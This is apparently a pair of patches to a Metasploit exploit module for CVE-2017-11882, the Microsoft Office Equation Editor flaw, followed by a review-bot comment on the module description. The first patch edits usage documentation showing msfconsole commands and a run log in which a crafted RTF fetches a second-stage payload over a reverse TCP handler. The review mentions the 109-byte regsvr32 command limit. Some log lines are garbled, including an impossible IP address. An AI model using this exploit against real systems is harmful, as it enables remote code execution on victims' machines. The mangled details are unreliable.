@@ -24,18 +24,15 @@ Filename to output, and location to which should be written. ``` msf > use exploit/windows/fileformat/office_ms17_11882 -msf exploit(office_ms17_11882) > set FILENAME /home/mumbai/file.rtf +msf exploit(office_ms17_11882) > set FILENAME msf.rtf FILENAME => /home/mumbai/file.rtf msf exploit(office_ms17_11882) > set LHOST ens3 LHOST => ens3 msf exploit(office_ms17_11882) > set LPORT 35116 LPORT => 35116 msf exploit(office_ms17_11882) > run -[*] Exploit running as background job 0. - -[*] Started reverse TCP handler on 192.168.0.11:35116 -msf exploit(office_ms17_11882) > [*] Using URL: http://0.0.0.0:8080/e08qBLfVxgaJZPo -[*] Local IP: http://192.168.0.11:8080/e08qBLfVxgaJZPo +[*] Using URL: http://0.0.0.0:8080/BUY0DYgc +[*] Local IP: http://192.1668.0.11:8080/BUY0DYgc [*] Server started. [*] 192.168.0.24 office_ms17_11882 - Handling initial request from 192.168.0.24 [*] 192.168.0.24 office_ms17_11882 - Stage two requestd, sending From b96dac28d520a51ac655e227bec0c4b8bae84106 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Mon, 4 Dec 2017 16:42:41 -0500 Subject: [PATCH 12/12] fix info segment --- modules/exploits/windows/fileformat/office_ms17_11882.rb | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index 291fe040452b..9dc87de6a89d 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb 
@@ -16,11 +16,10 @@ def initialize(info = {})
 super(update_info(info,
 'Name' => 'Microsoft Office CVE-2017-11882',
 'Description' => %q{
- Module exploits a flaw in the Equation Editor, developed
- in 2000, that allowed any OLE object to execute in a separate
- address space. Compared to original PoC, allows for a command within
- a length of 109 bytes to be executed Affects Microsoft Office word for the latest
- 17 years.
+ Module exploits a flaw in how the Equation Editor that
+ allows an attacker to execute arbitrary code in RTF files without
+ interaction. The vulnerability is caused by the Equation Editor,
+ to which fails to properly handle OLE objects in memory.
 },
 'Author' => ['mumbai', 'embedi'],
 'License' => MSF_LICENSE,
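Review bot: The rewritten description is ungrammatical (`a flaw in how the Equation Editor that allows`, `to which fails`) and drops the one operational caveat the old text carried — the command length limit — even though generate_rtf still pads into a fixed 197-byte slot, which by the byte counts in the earlier hunks leaves 109 bytes for the `regsvr32` command line. I would write it as: `Module exploits a flaw in the Equation Editor (Equation.3 OLE object) that fails to properly handle OLE objects in memory, allowing arbitrary code execution when a crafted RTF file is opened; no interaction beyond opening the document is needed. The payload is fetched by a regsvr32 scriptlet command that must fit in 109 bytes, so keep LHOST/URIPATH short.` The `super(update_info(` call continues past this hunk.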